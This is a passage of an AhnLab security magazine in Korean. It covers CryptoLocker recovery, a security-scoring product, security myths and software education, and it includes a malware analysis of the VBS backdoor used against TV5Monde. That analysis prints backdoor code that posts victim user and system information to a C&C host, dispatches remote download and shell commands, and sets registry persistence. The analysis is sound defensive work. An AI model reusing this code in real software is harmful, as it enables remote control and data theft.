복구프로그램이번에한글로유포된크립토락커에대한복구프로그램은내부에감염사용자별로다른복호화키인덱스정보 (0x20바이트) 를포함하고있다. 실행시, [ 그림 9] 와같은화면이나타나며 Start Decryption 버튼을클릭하면, 감염조건에부합하는드라이브및폴더에대한스캔과정을수행하며.encrypted 확장자를갖는파일들에대해실제복호화작업이이루어짐을확인할수있다. [ 그림 10] 은실제복구툴내부에저장된키인덱스정보 (0x20 바이트 ) 를 통해생성된데이터 (0x108 바이트 ) 와.encrypted 파일에존재하는해 시정보를비교해유효한키인지검증하는과정을나타낸다. [ 그림 10] 유효한키여부검증하는부분 [ 그림 9] 복구프로그램내부에저장된키정보 이때.encrypted 로암호화된파일은공통적으로원래파일크기에 0x108(264바이트 ) 가증가한것을알수있다. 파일끝에추가된 0x108 크기의데이터는다음과같은구조를갖는다. 증가한 264 바이트 = 해시정보 (4 bytes) + 시그니처 (4 bytes) + 공개키 (256 bytes) 최근이슈가된크립토락커는국내유명커뮤니티웹사이트의광고배너를통해유포되면서큰피해를입혔다. 이에웹관리자의보안에대한주의가필요하며 PC 사용자는랜섬웨어악성코드를예방하기위해발신자가불명확한이메일의열람에주의하고중요파일들은별도로백업해두는것이좋다. 그리고취약점에의한감염피해를줄이기위해운영체제와응용프로그램들을항상최신으로업데이트해야한다. 이외에도백신프로그램을통해예방할수있는데 V3에서는해당악성코드를 Win-Trojan/Cryptolocker.229892, Win-Trojan/ Cryptolocker.Gen, Trojan/Win32.Cryptolocker 등으로진단하고있으며안랩은현재까지파악된관련악성경유지및유포지를확보했다. 이를통해추가피해가발생하지않도록지속적으로모니터링을강화하고있다. 20
Product Issue AhnLab 내 PC 지키미 AhnLab 내 PC 지키미 기반의통합적인보안지수화모델 핫 (hot) 한 보안지수화 사업모델을찾는다면? 최근보안의초점이다시엔드포인트로향하고있다. 날로증가하는보안위협에대응하기위해다양한보안솔루션을도입하는것도중요하지만결국엔드포인트의보안관리가근본이자핵심이라는것이전문가들의공통된목소리다. 특히기존의형식적인점검이아니라실질적인관리의형태로변화하고있다. 이와관련해최근 보안지수화사업 이화두가되고있다. 이글에서는보안지수화의의미와함께효율적인보안지수화수행방안에대해알아본다. 최근보안담당자들은정해진일정에따른단순점검이아니라엔드포인트의보안상태를어떻게지속적으로모니터링하고관리할것인지에대해고민하고있다. 물론가장이상적인방법은사용자, 즉조직구성원들이스스로관심을갖고 PC의보안상태를점검하고조치하는것이겠지만, 바쁜업무속에서꾸준히보안에관심을갖고관리하기를기대하는것은현실적으로무리가있다. 상황이이렇다보니기업들은각 PC의보안관리현황을 핵심성과지표 (Key Performance Indicators, KPI) 에반영하는방안을검토하고있으며, 이와관련해 보안지수화 사업이조명받고있다. 보안지수화, 능동적인사용자보안관리유도할것 보안지수화 란말그대로보안현황을수치화하여관리하는것이다. 대부분의기업은이미엔드포인트부터네트워크에이르기까지다수의보안솔루션을도입및운영하고있다. 각각의 PC에설치되어있는보안솔루션만해도그수와종류가상당하다. 따라서조직구성원들, 즉사용자가 PC의보안상태를쉽게확인하고조치할수있도록하는것이보안지수화사업의핵심이다. 단순히백신의최신엔진업데이트여부나개인정보파일에대한암호화관리등에대해일일이점검하는방식이아니라위협이될수있는요소들에대한보안현황을한곳에집중시켜이를점수화함으로써사용자스스로가 PC의보안상태를관리할수있도록유도하는것이다. 보안지수화는보안솔루션의설치및점검여부에대한확인뿐만아니라실질적인엔드포인트의보안위협요소를다음과같은항목으로분류한다. 1. 백신의악성코드탐지여부 2. 개인정보보유현황및유출탐지여부 3. 설치된프로그램의최신패치적용여부 4. PC 취약점점검현황및보안평가점수위와같은기준으로다양한엔드포인트보안솔루션에서추출된정보는 [ 그림 1] 과같이 보안점검수집서버 에서취합된다. 수집된정보는보안관리자가설정한가중치와함께종합적으로판단해수치화, 즉점수로환산하여각 PC 사용자에게제공된다. 이를통해사용자들은자신의 PC 가얼마나안전하게유지되고있는지를수시로확인하고어떤항목을보완해야할지파악함으로써 PC 보안상태를스스로관리할수있다. 또한이러한각 PC의정보는월단위로취합, 정리되어핵심성과지표 (KPI) 에반영된다. 이를통해기존의수동적인보안관리방식에서벗어나사용자스스로관심을갖고능동적인보안관리를이끌어낼것으로기대된다. 21
[ 그림 1] 보안지수화솔루션구조 안랩내PC지키미, 보안지수화모델제시보안지수화사업과함께 안랩내PC지키미 에관심이집중되고있다. 특히최근금융감독원고시에따라금융권에서도지난 4월 16일부터 정보보안점검의날 이시행됨에따라안랩내PC지키미에대한문의가이어지고있다. PC 취약점점검솔루션인 안랩내PC지키미 는최신보안위협요소를중심으로 42개항목에대해 PC의보안상태를자동으로점검하고점수화한다. 홈 (Home) 화면을통해보안점수와점수추이그래프를제공해사용자의관심을유도한다. 또한 자동조치 기능을통해취약한항목에대해쉽고간편하게개선할수있어사용자의편의성을극대화한다. [ 그림 2] 안랩내 PC 지키미 보안관리자는 강제조치 기능을통해효율적으로보안정책적용이가능해관리부담은최소화하고기업의전반적인보안수준향상을꾀할수있다. 특히백신강제업데이트뿐만아니라패치관리솔루션, 개인정보보호솔루션의연동및통합관리등의기능을통해타제품과는차별적인엔드포인트통합관리를구현한다. 안랩내PC지키미와패치관리솔루션을연동하여사용할경우윈도보안패치뿐만아니라마이크로소프트오피스제품군, 인터넷익스플로러 (Internet Explorer), 아래아한글, 어도비 (Adobe), 자바 (JAVA) SE RE 패치등을항상 안전 상태로유지할수있다. 또한업무용 PC에설치된불법소프트웨어도손쉽게확인할수있다. 아울러개인정보보호솔루션과연동할경우, 관리자가설정한개인정보파일의조치조건에따라안랩내PC지키미는각 PC의개인정보파일조치현황을안전, 취약등으로표시하여사용자의즉각적인개인정보관리를유도할수있다는것도특징이다. 한편안랩은금융권고객의 증적자료제출 에대한부담을덜어주기위해안랩내PC지키미의리포트기능에 업로드 기능을연내추가할예정이다. 22
Threat Analysis Cyber Attack 해외타깃공격에이용된악성코드상세분석 프랑스국영 TV 해킹악성코드, 실체를밝힌다 사이버공격의대상이다양한산업군에서국가기관으로확대되고있다. 특히최근정치 사회적으로국가간이해관계가첨예하게대립함에따라사이버공격이더욱격화되는양상을보이고있다. 실제로 2015년 4월 8일프랑스공영방송인떼베생몽드 (TV5Monde) 는사이버공격으로인해산하 11개채널의방송불가상태를겪어야했다. 떼베생몽드에따르면이공격은이슬람국가 (IS) 혹은추종자에의해발생했다. 이글에서는떼베생몽드사이버공격에이용된악성코드에대해소개한다. 떼베생몽드침해사고발생떼베생몽드 (TV5Monde) 는 1984년 1월 2일개국한프랑스어로방송되는글로벌텔레비전방송국이다. 2015년 4월 8일밤프랑스떼베생몽드방송국의페이스북계정이해킹당해이슬람국가와관련된글이올려졌다. 그리고, 방송시스템과홈페이지, 페이스북계정이모두마비되었다. Central Command) 의트위터계정을해킹해선전글을남긴바있다. 떼베생몽드침해사고의원인과경로에대해서자세히밝혀지지않았지만, 사고다음날인 4월 9일 TV 화면을통해떼베생몽드의부실한보안관리체계가드러났다. [ 그림 2] 에서볼수있듯이 9일방송된 TV 프로그램중인터뷰영상에서암호로보이는문자열을쓴스티커가화면에비춰졌다. 이스티커에적힌것은유튜브계정암호로알려졌다. 실제로 9일화면에비춰진유튜브암호는 lemotdepassedeyoutube 로, 프랑스어로유튜브암호라는뜻이다. [ 그림 1] 떼베생몽드 (TV5Monde) 해킹기사 이공격의배후로는이슬람국가 (Islamic State, IS) 혹은추종자인것으로알려졌다. 이슬람국가는 2015년 1월에도미국중앙사령부 (U.S. [ 그림 2] 떼베생몽드의트위터암호가노출된방송화면에대한트위터 23
이때악성코드제작자도확인되었는데쿠웨이트인나서알무타이리 (Naser Al Mutairi) 와알제리인무하메드베나브델라 (Mohamed Benabdellah) 로밝혀졌다. [ 그림 3] 암호노출에대한트위터 떼베생몽드가암호를적은스티커를벽이나 PC에붙여두었을만큼암호관리가허술했으며, 이러한부실한보안관리체계가침해사고와무관하지않다는것을짐작할수있다. 떼베생몽드공격에이용된악성코드 2015년 4월 9일글로벌보안업체블루코트 (Blue Coat) 에서떼베생몽드침입과관련된악성코드정보를공개했다. 제작자는다양한악성코드생성기를만들어서배포하고있다. 비주얼베이직악성코드생성기도있다. 생성기마다만들어진 VBS 코드형태는조금씩다르지만, 사용자정보탈취및백도어기능을수행하는점은동일하다. 이악성코드생성기를실행하면통신용포트 (port) 번호를입력한다. 호스트 (host) 주소, 포트 (port), 이름 (name), 디렉터리 (directory) 설정, 인스톨이름 (Install name) 등을사용자가설정할수있다. 단, 생성된파일은조금씩달라질수있다. 악성코드생성기살펴보기지금부터공개된소스코드를바탕으로일부수정된몇가지악성코드생성기가어떻게악성코드를생성하는지그과정을살펴보자. 1) 악성코드생성기 1 우선악성코드생성기를실행시키면 [ 그림 6] 과같이포트 (Port) 설정창이뜬다. [ 그림 4] 블루코트블로그 떼베생몽드에서발견된악성코드는아랍어권에서피해가많은 Njworm 악성코드의변형으로밝혀졌다. 아랍어권유행악성코드 Njrat, Njworm 쿠웨이트인 Njq8이제작한 Njrat와 Njworm은다소생소하지만아랍어권에서는인기가높은악성코드이다. 인터넷을통해아랍어로된사용법동영상도쉽게볼수있다. 이런언어적이점으로해당지역에서인기있는백도어가되었다. [ 그림 6] 생성기포트설정 위과정이완료되면 [ 그림 7] 과같이로그창에포트에연결되었다는메시지를보여준다. [ 그림 7] 포트접속 흰창에서오른쪽마우스를누르면명령을전송할수있는창이뜬다. 명령종류는웜 (w0rm), 컴퓨터 (Computer), 실행 (Run), 선택 (Options) 으로나누어져있고, 종류에따라여러명령을줄수있다. [ 그림 8] 명령창 [ 그림 5] 아랍어로제작된악성코드활용동영상 (https://www.youtube.com/watch?v=sktoonku1w0) 선택후빌더 (Builder) 를클릭하면아이피 (IP) 와포트 (Port) 등을초 기화할수있는창이뜬다. 호스트, 포트, 이름, 인스톨이름은사용자마음대로설정할수있고, 디렉터리는 6개중에서선택할수있다. 또한 2013 년 5 월에는소스코드가공개되어이를기반으로한변형이 발견되었다. 이중변형생성기가 2014 년 12 월 8 일아랍어개발자 사이트에업로드되기도하였다. 이악성코드로인한피해가증가함에따라 2014년 6월 MMPC (Microsoft Malware Protection Center) 는악성코드의실체를공개하고더이상악의적인활동을할수없도록조치에나섰다. [ 그림 9] 빌더를통한악성코드생성 24
2) 악성코드생성기 2 이번에는또다른악성코드생성기를살펴보자. 이생성기를실행하면 [ 그림 10] 과같이포트번호를입력하고, [ 그림 11] 과같이간단하게설정할수있는화면이나타난다. VB 스크립트백도어떼베생몽드에서발견된악성코드는이런생성기중하나로제작된비주얼베이직스크립트 (VBS) 악성코드로사용자정보탈취및원격제어가가능하다. 이악성코드는 [ 그림 15] 와같은동작을수행한다. [ 그림 10] 악성코드생성기 2 의기본화면 [ 그림 15] 동작순서 1) 파일생성 C:\Documents and Settings\Administrator\ 시작메뉴 \ 프로그램 \ 시작프로그램 \SecurityNajaf.vbs C:\Documents and Settings\Administrator\Local Settings\Temp\( 원본 ).vbs [ 그림 11] 설정화면 명령종류는간소해졌다. 파일실행 (Run File), VBS 코드 (VBS code), 언인스톨웜 (Uninstall worm) 등세명령만존재한다. 2) 레지스트리자동실행등록 HKCU\Software\Microsoft\Windows\CurrentVersion\ Run\SecurityNajaf "wscript.exe //B "SecurityNajaf.vbs"" HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion \Run\SecurityNajaff "wscript.exe //B "SecurityNajaf.vbs"" 3) C&C 통신스크립트코드는크게초기화부분과백도어부분으로나눌수있다. 초기화부분은인스톨이름, IP, 포트설정등과같은기본적인것을설정할수있다. [ 그림 12] 명령창 역시호스트, 포트, 이름, 인스톨이름은사용자가마음대로설정할수있다. 그리고, 전파파일이름 (Spread File Name) 과디렉터리부분은수정되었다. [ 그림 13] 생성기 2 의설정화면 앞서설명한두생성기의가장큰차이점은실행환경이가상환경인지를확인하는코드의유무이다. 생성기 1은가상환경확인코드가존재하지않지만, 생성기 2는코드시작부분에 vmcheck() 함수가존재하여, 만약가상환경이라면실행한 VBS 파일을삭제하고바로종료된다. [ 그림 14] 두악성코드의차이점 _ 가상환경검사코드 dim installname installname = "SecurityNajaf.vbs" dim dir dir = "Temp" path = shell.expandenvironmentstrings("%" & dir & "%") & "\" dim spl spl=" SE-NAJAF " dim http set http = CreateObject("MICROSOFT.XMLHTTP") dim host host = "127.0.0.1" dim port port = "1144" dim name name = "SECURITY 2014" [ 그림 16] 초기화코드 백도어부분은 C&C 에서보내는명령에대한행위동작이정의되어있다. cmd = Send ("READY","") response = split(cmd,spl) select case response(0) Case "uninstall" uninstall case "RE" shell.run WScript.SCRIPTFULLNAME,7 WScript.Quit case "download" download response(1),path & response(2) [ 그림 17] 원격제어명령수행코드 25
자세한명령어와기능은 [ 표 1] 과같다. 명령어 기능 uninstall 스크립트 Uninstall RE 스크립트재실행 (Reload) download 파일다운로드 update 스크립트업데이트및재실행 (Reload) execute 파일실행 cmd 셸명령수행 Attack 타깃에 Ping 무한반복 ourl URL 열기 close 스크립트종료 shutdown 컴퓨터종료 restart 컴퓨터재시작 하지만, 발견된악성코드는접속주소가자기자신이어서테스트목적으로제작되었을가능성이높다. 지금까지프랑스떼베생몽드의방송중단이라는초유의사태를일으킨악성코드에대해살펴보았다. 일반적으로정치적목적을위한사이버공격에서방송국은훌륭한목표가될수있다. 프랑스떼베생몽드뿐아니라우리나라도 2013년 3월 20일방송국컴퓨터가공격당한일이발생했다. 국내는방송송출까지문제가발생하지않았지만프랑스떼베생몽드에서는방송송출까지장애가발생했다. 이런사이버공격을통해방송내용가로채기, 방송송출장애와같은공격이발생할가능성이높다. 따라서, 방송사의보안강화가절실히요구된다. 또한정치적이유로특정국가, 지역에서유행하는악성코드가공격에동원될수있어이들국가에서널리이용되는악성코드에대한파악도필요하다. logoff [ 표 1] 명령어종류 로그오프 [ 참고문헌 ] 이악성코드에는백도어이외에사용자정보를탈취하는기능이존재한다. 사용자정보에는사용자이름, 컴퓨터이름, 볼륨시리얼넘버, 윈도버전정보등이있다. function Send(cmd,data) Send = "" http.open "POST","http://" & host & ":" & port &"/" & cmd, false http.setrequestheader "User-Agent:", userinfo http.send data Send = http.responsetext end function function userinfo on error resume next if userinfo = "" then x = "XDZX" userinfo = x & " startinfo" & spl & name & hwid & spl & OS & spl & computer & spl & username &spl & security & spl & usb & spl & "1.2" &spl & x end if end Function function computer computer = shell.expandenvironmentstrings("%computername%") end function function username username = shell.expandenvironmentstrings("%username%") end function [ 그림 18] 시스템정보수집코드 [1] French TV station TV5Monde hit by Islamic State hack (http:// www.dailymail.co.uk/wires/afp/article-3031644/french-tv5monde-hitpro-islamic-state-hackers.html) [2] Simple njrat Fuels Nascent Middle East Cybercrime Scene (http:// www.symantec.com/connect/blogs/simple-njrat-fuels-nascent-middleeast-cybercrime-scene) [3] New RATs Emerge from Leaked Njw0rm Source Code (http://blog. trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-fromleaked-njw0rm-source-code) [4] https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d. pdf [5] http://www.lemonde.fr/pixels/article/2015/04/09/les-sites-de-tv5- monde-detournes-par-un-groupe-islamiste_4612099_4408996.html [6] www.cnbc.com/id/102330338 [7] https://twitter.com/pent0thal [8] https://www.bluecoat.com/security-blog/2015--04-09/visual-basicscript-malware-reportedly-used-tv5-monde-intrusion [9] https://www.youtube.com/watch?v=sktoonku1w0 [10] https://jomgegar.com/topic/14665-njrat-v07dbuilderstub-fullsource-code/ [11] http://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoftdigital-crimes-unit-disrupts-jenxcus-and-bladabindi-malware-families. aspx [12] http://blogs.microsoft.com/blog/2014/06/30/microsoft-takes-onglobal-cybercrime-epidemic-in-tenth-malware-disruption/ 26
Expert Column Software & Creativity 소프트웨어교육은필요한가? 소프트웨어와창의력 2014년부터 IT 업계와교육계가주목하는화두중하나는 소프트웨어교육 이다. 모바일의급격한확산과애플리케이션에대한관심이증가하였으며, 정부의 소프트웨어중심사회 정책의발표로코딩에대한열기가그어느때보다뜨거워졌다. 소프트웨어를만드는프로그래밍교육을통하여논리력과사고력을키우고, 창의적인인재를양성한다는이야기가여기저기서쏟아지고있는데과연소프트웨어교육이논리, 사고, 창의에관한능력을키우는데도움이되는것일까? 월간 안 에서는이질문에대한답을찾기위해서과거와현재, 소프트웨어와창의력, 그리고소프트웨어의미래에대해두번으로나누어서정리하였다. < 연재목차 > 1 부 _ 지금은소프트웨어의시대 (2015 년 4 월호 ) 2 부 _ 소프트웨어와창의력 ( 이번호 ) 피타고라스의정리 2014년 8월세계수학자대회가서울에서열렸는데, 이대회의주관방송사였던 EBS는관련된시리즈로 5부작다큐멘터리 < 다큐프라임 문명과수학 > 을방송하였다. 이프로그램의 2부에서는이집트피라미드의높이와변의길이를구하는고민에서출발하여피타고라스의정리에대해서다루었다. 우리나라의중학교교과과정에서배우는피타고라스의정리는 c 2 = a 2 + b 2 이라는공식으로표현되고있는데, 직각삼각형의두밑변의길 이를알면그로부터나머지한변의길이를계산할수있음을의미한다. 하지만교과과정에서증명하는방법은대부분한가지만배우고만다. [ 그림 1] 피타고라스의정리 실제로이정리를증명하는방법은동서양을막론하고매우다양하여중국의고대수학서인 주비산경 에는 구고현의정리 라고불리는아주오래된것부터피타고라스의정리와함께약 400여가지가알려졌다고한다. 하나의증명방법만알고있는대부분의사람들에게 400이라는숫자는비현실적으로들리지만, 가만히생각해보면우리는한가지방법 으로만생각하고있다는뜻이다. 하나의현상을설명할수있는방법은다양한데, 평생오직한가지방법만알고지낸다면다른방법에서보여주는수많은논리와지식의폭을경험할수없다고생각하니매우안타까운일이다. 산업화와정보화왜다양한방법중에서하나의방법만을배우게된것일까? 설명할수있는수많은논리가있겠지만, 살아온시대적배경이우리를그렇게이끌었다는점을설명해보려고한다. 산업혁명이후에우리는대량생산 (Mass Production) 의시대를살아왔다. 인구가기하급수적인그래프를그리면서폭발적으로증가함에따라수요를충족시키기위한생산성의증대가매우중요해졌다. 이시대는몇가지종류의상품을대규모로생산하고유통하여같은것을소비했다. 이를위하여산업시설을확장하고공급량을늘려서수요를뒷받침할수있도록프로세스와속도가매우중요한시스템으로자리잡았다. 즉, 최적화되고정형화된프로세스와이를활용한생산성향상이중요한관리목표가되었고, 커뮤니케이션, 연산, 도식화, 논리적설계, 우수한기술의활용등이산업화의중심이되면서국어, 영어, 수학, 과학과같은과목이중시되었다. 또, 이를실현할수있는대규모하드웨어설비, 사회기반시설, 생산시설과운송역량등이확산되었다. 그러나 2000년대이후에는속도와생산성을추구하던산업화시대의가치는더이상유효하지않다. 이제인구가정체되거나감소하는시대가되었고더불어줄어드는수요와함께새로운방향에대해고민해야하는시점이된것이다. 27
소수의상품을대량으로생산하던시대를지나서수요가정체되면그동안소홀히여기고있었던비교적작지만나름의시장을가지고있는작은수요들을돌아보게된다. 이러한작은수요들은 ( 대량으로생산되던시장과비교하여 ) 다양한모습을가지고있다. 예를들어컴퓨팅파워가중요한시대에는얼마나빠른 CPU와메모리를가지고있는가가중요한가치로작용했다면, 이제는메모리가큰컴퓨팅파워가필요한경우, 그래픽처리를더많이필요로하는경우, 네트워크속도가중요한경우등서로다른부분이중요하게여겨지는수요들로나뉘게되었다. 이러한시대적흐름에서는다양한것에대한정보의획득이중요하다. 즉, 산업화시대에는같은정보혹은더많은정보를가지는것이유리한반면, 다양성을중요시하는현재는해당분야에서필요한더좋은정보를확보하는것이중요해졌다. 다양성의구체화, 소프트웨어교육 2014년포브스가조사한세계브랜드순위에서 1위는애플, 2위마이크로소프트, 3위코카콜라, 4위 IBM, 5위가구글로조사되었다. 코카콜라를제외하고는모두 IT 기업이라는점이현재를이끌고있는파워가어디에있는지를미루어짐작할수있을것같다. 소프트웨어교육에대해서국가별로관심과실천방안들이나오고있다. 영국의경우 2014년을 코드의해 (Year of Code) 로지정하여코딩교육의중요성을알리고격려하는캠페인을진행했으며, 우리나라의국어 영어 수학과목처럼코딩교육을필수로지정하였다. 미국은버락오바마대통령이 Code.org의캠페인에참여해학생들과함께코딩을배우기도했고, 우리나라도 2014년 7월에 소프트웨어중심사회 에관한정부주도의비전을제시하면서코딩을수능에반영하는논의가시작되었다. 애플의창립자인스티브잡스는 사람들이프로그래밍을배워야하는이유는사고하는법을배워야하기때문이다 라고하였으며, 미국의대통령인버락오바마도 코딩을배우는것이개인의미래를위해서라기보다는자국의미래를위해중요하다 고말할만큼소프트웨어교육과사고는매우중요하게이야기되고있다. 창의적사고와경험의축적흔히 IQ로이야기하는지능지수는창의력지수가아니다. IQ는몇가지척도 (scale) 로구성되어있는데, 일반적으로언어력, 수리력, 기억력, 논리력, 공간지각능력등이다. 언어력은말이나글로써표현하는능력을뜻하며, 수리력은수학적인계산이나숫자에대한능력, 기억력은단기나장기기억속에얼마나잘저장하고인출할수있는가에대한능력이다. 논리력은논리적으로생각하고표현할수있는능력을말한다. 공간지각능력은공간에대한이미지와인식능력인데주차를쉽게한다거나도형의숨겨진부분을잘파악한다거나하는능력을의미한다. 즉, 지능지수는사람이가지고있는사고의체계를구성하고있는요소를각각평가하는지표라는의미이며, 지능이높다고창의적이라는의미는아니다. 아르키메데스가목욕통속에앉아있다가물이넘치는것을보고 비중 이라는것을깨닫고뛰쳐나오며 유레카! 라고외쳤다는이야기는잘알려져있다. 그렇다면창의력, 창의적인사고는어디에서오는것일까? 인간은학습이나독서등을통하여습득하는지식, 그리고살면서겪는다양한직 간접적인경험, 어떤문제를풀고해결한결과들을모아하나의개인적인체계를갖게된다. 이러한체계에새로운지식과경험이추가되면서계속성장해나가게되는것이다. 또한어떤임계점을넘어서게되면비로소새로운아이디어로연결되고, 창의적인사고로발전하게된다. 즉, 인간의지능은논리와사고력을중심으로성장할것이고, 여기에지식과경험이누적되면창의력이라는새로운눈을뜨게될것이다. 이런학습된경험을제공하는방법으로소프트웨어는매우유용한도구가될수있다. 소프트웨어와문제해결능력소프트웨어를통한학습은문제를파악하고상황을다양하게풀어내는능력을키우는좋은방법이다. 소프트웨어는문제해결에있어서논리적인흐름을따르게되는데, 흔히알고리즘이라고하는논리의연속적인연산작용을이용하게된다. 해결해야할문제를작은문제들로나누고, 각각해결할수있는답을작성하고, 작은문제들이연결되어원래의큰문제를해결할수있도록맞추어나가다보면결국처음의문제를해결할수있게되는것이다. 이러한단계를거치기위해서는문제를작게나누고연결할수있는논리적인사고와작은문제들을다른방향에서바라보면서해결할수있는창의적인사고가필요하다. 소프트웨어는하드웨어와달리프로그래밍언어로수정이가능하도록유연하게구성되어있고, 수정된코드는업데이트가가능하다. 프로그래밍을시작할때처음배우는 Hello PC World 를출력하는코드는사실몇줄만으로가능하다. 하지만작성하는언어에따라, 프로그래머에따라다른코드로작성이되며, 4~5줄에서 100여줄까지길이도천차만별로나올수있다. 소프트웨어로코딩을하는것은운영체제위에서돌아가는프로그램, 브라우저에서돌아가는프로그램, 데이터베이스를다루는데특화된프로그램등다양한프로그래밍언어를가지고작업을할수있기때문에, 똑같은결과물을보여주더라도그것을구현하는프로그램은제작자의논리력과창의력에따라아주다르게나올수밖에없다. 결론적으로, IT 기술이우리의삶에중요한부분으로자리잡게되면서소프트웨어에대한이해와교육이주목받고있다. 교과과정을통해서같은내용을배우고세상에나와서활용하던산업화를지나서이제는다양한문제를해결하고창의적인사고를기를수있는소프트웨어의시대가되었다. 창의적이라는것은지식, 경험, 습관에서나오는것이며이를키우고유지하기위해서는좋은업무환경과자신의방식으로습관을만들어가는것이다. 특히소프트웨어는안정된운영을중시해야하는하드웨어에비해서다양한방법으로문제를해결하는방법을생각할수있게해주는가장좋은방법이아닌가생각한다. 28
IT & Life 전문가가전하는보안에대한 오해와진실 정보기술의발전은평범한개인도정보보안에대해고민하게한다. 보안취약점, 악성코드, 해킹사고등보안이슈는개인뿐만아니라국가의안전을위협하는요소로발전하고있다. 북대서양조약기구인나토 (NATO) 는사이버공격을전쟁의한종류로규정하고교전수칙을제정하는단계에이르렀다. 반면일반사람들은국내외언론및온라인매체들을통해매우복잡하고고도화된사이버공격사례를많이접해서인지자신의정보기기를지키기위해할수있는일은거의없다고생각한다. 이에일반사용자의정확한이해와피해예방및보안인식제고를위해정보보안에대한오해와진실을전한다. 1. 비밀번호는별로중요하지않다? 대부분사람들은대형보안사고가발생할때마다자신과는상관없다고생각한다. 개인적인이익을노리는해커는대부분기관이나기업을대상으로하기때문이다. 그렇다면개인은표적공격에서자유로울까? 틀린말은아니지만, 꼭그런것만도아니다. 일반사용자를대상으로한공격은불특정다수에게무작위로배포되는악성코드거나취약점공격일가능성이크다. 이와같은공격은일반적으로개인정보탈취를통한금전적이득이목적인만큼강력한비밀번호와 2단계인증을사용하면예방할수있다. 예를들어평소에사용하는웹사이트의계정을 패스워드매니저툴 에저장하고이툴에서생성하는일회용비밀번호 (OTP) 를통해웹사이트에로그인하는것도하나의방법이다. 또한, 2단계인증 ( 예 : 비밀번호 + 문자메시지인증 ) 을사용하여이메일이나 SNS에로그인하는것도효과적이다. 강력한비밀번호는대문자, 소문자, 숫자, 특수문자조합으로최소 8자리이상으로구성된길고복잡한문자열로구성하는것이다. 귀찮다는핑계로간단한비밀번호를사용하는이들이다음의표를본다면왜복잡한비밀번호를설정해야하는지이해가빠를것이다. 패스워드를깨는데걸리는시간 < 출처 : https://howsecuritymypassword.net> 2. 새로구입한노트북은안전할까? 보안관련오해중에는새로산기기는안전하다고생각하는것도있다. 최근레노버사가노트북에 슈퍼피시 (Superfish) 라는애드웨어 (Adware) 를심어판매했던사실이알려져논쟁거리가됐다. 슈퍼피시는자체루트 (root) 인증서를심어사용자의온라인활동을동의없이감시하기때문에백도어 (back door) 로악용될가능성이크다. 지난 3월초발견된 SSL FREAK 취약점은 1990년대미국정부의해외수출용암호화키길이제한에서비롯됐고한국을포함한전세계를떠들썩하게했다. 결국, 새로구매한노트북의안전은내부에설치된소프트웨어의보안성에달려있다. 윈도 OS와같은소프트웨어는수백만줄의코드로구성돼있는데그복잡성을생각하면보안무결성을보장하는것은거의불가능하다. 개발자는소프트웨어전체에단한개의버그가없도록노력해야겠지만해커는단한개의취약점만찾으면된다. 따라서소프트웨어는항상버그가있고그중영향력이큰것은보안에도막대한영향을미친다는점을염두에둬야한다. 또새로구입한노트북이나기기도소프트웨어를설치할때보안패치나백신설치를하면좋다. 3. 백신프로그램은보안의종결자? 많은사람이오해하고있는것중에는백신프로그램을설치하고업데이트만하면보안이해결된다고생각한다. 물론어느정도보안에도움이되는것은사실이지만완벽한해결책은아니다. 백신은알려지지않은악성코드에대한선제예방솔루션이아니라알려진악성코드에대한대응적방어책이기때문이다. 일반적으로백신은각보안업체에서분석한악성코드의정보를바탕으로악성코드의 블랙리스트 를만들고, 이를백신에반영한다. 이를기반으로백신이설치된 PC를스캔하고 블랙리스트 에해당하는악성코드를검출해내는방식을사용한다. 즉, 백신의악성코드에대한대응은 29
1) 새로운악성코드접수및수집 2) 악성코드분석 3) 악성코드시그니처업데이트및백신엔진에업데이트하는단계를거친다. 대부분악성코드접수에서엔진반영까지시차가발생할수밖에없다. 해커는대상으로삼은기업의백신이잡지못하는악성코드를찾아내공략하기때문이다. 하루평균 15~50만개사이의신 변종악성코드가만들어지고있어백신업체는매일악성코드와의전쟁을치르고있다고해도과언이아니다. 많은보안전문가의조언처럼최악을피하는차선책은백신프로그램을설치하고최신엔진으로유지하는것이다. 이는보안의기본이면서도가장중요한예방책이다. 4. 그러면백신은아무소용없다? 이러다보니, 일각에서는지능형위협공격 (APT) 에대해백신이소용없다고생각하는경우가많다. 하지만이는대단히위험한발상이다. 백신은이미알려진보안위협에대한기본적인방어책이다. 백신이없다면인터넷에서쉽게구할수있는매우낮은단계의해킹툴등에도개인의 PC나조직의방어막이쉽게뚫릴수있기때문이다. 또한, 3 20 사태와같이최근의 APT 공격은기업및조직의서버나네트워크에직접침투하는것이아니라개인 PC에먼저침투하고, 내부중요 IT 인프라에침입하는방식이주를이루고있다. 이러한경향에기반을둬많은전문가는최초감염단계를 APT 공격에서는매우중요하게생각한다. 따라서백신은소용없는것이아니라백신만으로는부족하다는의미로이해해야한다. 위에서언급했던것처럼백신이보안을 100% 완벽하게해결해주진못하지만, 기본방어막은될수있다. 따라서사용자는항상백신을최신엔진으로유지하고사용중인소프트웨어의보안패치도새롭게추가될때마다적용해야적어도알려진악성코드에대해서는안전하다. < 참고사이트 > http://gizmodo.com 30
IT & Life 메모리해킹수법과예방법 피싱, 파밍, 스미싱은많은매체를통해특징이나피해사례에대해잘알려졌지만메모리해킹 (Memory Hacking) 은피해사례가많지않아여전히생소한개념이다. 메모리해킹은사용자 PC의메모리에있는금융정보를탈취하여정상적인인터넷뱅킹과정을거치더라도중간에서이체계좌나송금금액을임의로변경하는방식으로, 피해자는피해사실을인지하기어렵다. 메모리해킹은파밍보다더교묘해인터넷뱅킹사용자입장에서는위험한전자사기로인식되고있다. 메모리해킹사례를통해예방법을알아봤다. 직장인어안이씨는평소와다름없이인터넷뱅킹을위해거래은행사이트에접속했고, 접속후공인인증서로로그인했다. 로그인후계좌이체를위해이체비밀번호를입력하고보안카드번호앞뒤 2자리를입력했다. 이제공인인증서의비밀번호만입력하면거래가완료되는찰나에갑자기 PC가다운됐다. 공인인증서비밀번호를입력하지않아서거래가처리되지않았을것으로생각한어안이씨. 귀찮지만 PC를재부팅하고인터넷뱅킹을다시시도해야겠다고생각하던차에휴대전화로 200만원출금 이라는문자메시지가도착했다. 말로만듣던신종전자금융사기의피해자가된것이다. 위의사례와같이메모리해킹은주로인터넷뱅킹과정에서발생한다. 메모리해킹이란컴퓨터에저장돼있던계좌번호나보안카드일부번호등을알아낸뒤돈을빼돌리는신종수법이다. 경찰청에따르면메모리해킹에는주로두가지수법이이용되고있다. 피해자의 